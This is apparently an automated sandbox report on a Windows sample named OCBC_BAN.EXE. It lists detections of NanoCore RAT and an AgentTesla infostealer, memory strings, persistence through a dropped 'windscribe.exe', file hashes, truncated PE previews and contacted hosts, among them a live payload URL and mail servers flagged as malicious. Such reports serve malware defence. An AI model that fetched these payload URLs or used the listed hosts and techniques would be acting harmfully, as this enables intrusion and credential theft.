Source: Yara match	File source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED
Source: Yara match	File source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR

Detected Nanocore Rat

Source: OCBC_BAN.EXE, 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: OCBC_BAN.EXE, 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: OCBC_BAN.EXE, 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	112 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	21 Input Capture	114 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	1 Remote Access Software	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	2 Non-Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	112 Application Layer Protocol	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
OCBC_BAN.EXE	32%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	37%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	85%	ReversingLabs	ByteCode-MSIL.Infostealer.DarkStealer
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe	32%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
12.0.OCBC_BAN.EXE.400000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
12.2.OCBC_BAN.EXE.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.0.OCBC_BAN.EXE.400000.10.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.0.OCBC_BAN.EXE.400000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.0.OCBC_BAN.EXE.400000.6.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.2.OCBC_BAN.EXE.5ba0000.9.unpack	100%	Avira	TR/NanoCore.fadte	Download File
12.0.OCBC_BAN.EXE.400000.12.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack	100%	Avira	HEUR/AGEN.1203035	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi	100%	Avira URL Cloud	malware
http://mx.mf.netgate.com.uy	0%	Avira URL Cloud	safe
http://WmuGtz.com	0%	Avira URL Cloud	safe
23.105.131.196	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://bmn.lpmpbanten.id	100%	Avira URL Cloud	malware
http://mail.elparque.com.uy	0%	Avira URL Cloud	safe
https://api.ipify.org%%startupfolder%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg	100%	Avira URL Cloud	malware
127.0.0.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bmn.lpmpbanten.id	103.8.79.204	true	true	unknown
mx.mf.netgate.com.uy	200.40.119.50	true	true	unknown
mail.elparque.com.uy	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
23.105.131.196	true	Avira URL Cloud: safe	unknown
http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg	true	Avira URL Cloud: malware	unknown
127.0.0.1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://bmn.lpmpbanten.id/fint/Waxhxbwa_Ytgbplyy.jpg9Mytlggh.Properties.ResourcesSCsupumbveaihwmgvdfi	OCBC_BAN.EXE, windscribe.exe.0.dr	true	Avira URL Cloud: malware	unknown
http://mx.mf.netgate.com.uy	Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://WmuGtz.com	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	OCBC_BAN.EXE, 00000000.00000002.535692685.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://bmn.lpmpbanten.id	OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://mail.elparque.com.uy	Pubrtkzyqpdcef1.exe, 00000009.00000002.634961619.000000000349E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org%%startupfolder%	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	OCBC_BAN.EXE, 00000000.00000002.535616448.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%	Pubrtkzyqpdcef1.exe, 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
200.40.119.50	mx.mf.netgate.com.uy	Uruguay	6057	AdministracionNacionaldeTelecomunicacionesUY	true
103.8.79.204	bmn.lpmpbanten.id	Indonesia	58551	IDNIC-MTN-AS-IDPTMediatamaTelematikaNusantaraID	true
23.105.131.196	unknown	United States	396362	LEASEWEB-USA-NYC-11US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	623417
Start date and time: 10/05/202214:45:59	2022-05-10 14:45:59 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	OCBC_BAN.EXE
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/5@3/3
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0%) Quality average: 50% Quality standard deviation: 44.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .EXE Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target OCBC_BAN.EXE, PID 4500 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: OCBC_BAN.EXE

Simulations

Behavior and APIs

Time	Type	Description
14:48:00	API Interceptor	455x Sleep call for process: Pubrtkzyqpdcef1.exe modified
14:48:27	API Interceptor	344x Sleep call for process: OCBC_BAN.EXE modified

Process:	C:\Users\user\Desktop\OCBC_BAN.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Download File

Process:	C:\Users\user\Desktop\OCBC_BAN.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	213504
Entropy (8bit):	6.064450389025509
Encrypted:	false
SSDEEP:	6144:pF+NaNYd62YXxU+RWaVswlPH5XfIrijRpS:pF+Na2dXYXzH5X5N
MD5:	4AD411F172F9362BB859CD369E5F3F8E
SHA1:	3CBD02B7847D7259274F145B1BBD5F6206FD98F2
SHA-256:	01E3C7651589A572C90A38AA1476BF4A50CCD35383FE3114BE11068D5C2A9E39
SHA-512:	F2550C12826A47AF942674295DFDA205EC9C78090646C788618A6F4573135BD1BC9EEA05088667B5EBABDD725368DD28F4CFD6E5E175BF14DE200558F739784D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 85%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sb.................8...........V... ........@.. ....................................@..................................V..O....`..0............................................................................ ............... ..H............text....7... ...8.................. ..`.rsrc...0....`.......:..............@..@.reloc...............@..............@..B.................V......H.......d...H.............................................................(......(.....s.........s.........s.........s............0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0..,.........+......,........,........,.+.+.~....o.....0............+......,........,........,.+.+...(....(.......0..(.........+......,........,........,.+.+..(....*.0..,.......

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Download File

Process:	C:\Users\user\Desktop\OCBC_BAN.EXE
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:hDl:hR
MD5:	832F2F5C81D72A07024A36A79123F2B7
SHA1:	465129A561D6FE73A2B7D3CC59474353C023ABA9
SHA-256:	01C03F65A92E5700D89800AD7D410DE0B0027A4E768B6B269B2A4404B87B215B
SHA-512:	C95FB1279878EB9DE4773F433F147DC9373A5F0307977D2B0D9E8786BB2B29BA11BBF47B06902DC111F5668DAE6EAA15B60B4D82BE488928D0C1BCFB6463AA4A
Malicious:	true
Preview:	X....2.H

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe

Download File

Process:	C:\Users\user\Desktop\OCBC_BAN.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	25088
Entropy (8bit):	4.239777799948537
Encrypted:	false
SSDEEP:	192:M+fFPxnDgmvb3J7uyDTIJ1/DWzFCOmNEvNesGGE/:dfFO2rJ6yDMJ1/i0SvNesI
MD5:	BE7BB1D25F6FB1B424AB8B54DC3971D0
SHA1:	73E4DCB20A351F5D7332AC2383FCE657F22906B2
SHA-256:	353FB33F1EE908DA348B403A829F36AD6F6BD0AA3022BC56F0542F9197266B20
SHA-512:	2B637EDDAF731E348064E4CF61F3C8DB9888E52C75141DE89F157102385DA300CC7439E5029CE80551BFFA51261E33A82ED1A5AB2BC2C7EF16F97788B6699EC8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yb.....................L.......3... ........@.. ....................................@.................................<3..O....@...J........................................................................... ............... ..H............text........ ...................... ..`.rsrc....J...@...J..................@..@.reloc...............`..............@..B................p3......H.......,$..............t#..............................................F...-.&(....+.&+....0..........r...p(.....-.+...(.....-.&+.&+..+..+..+....0..P.......s.....-.+A..i.,.&+..+..+......+..%.Y.,.&....+.o....+..-.+..+..o....(...+.+.&+...0..v....... .....-.&..(....+.&....-.&+D.+..s....(.....-.+B.o....o....s.....+..+..(..... ....o........o................-...+.&+......................E..Y......F...-.&(....+.&+.^.-..-.+.(....+.(....+.F...-.&(....+.&+..0..P.......~.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\windscribe\windscribe.exe:Zone.Identifier

Download File

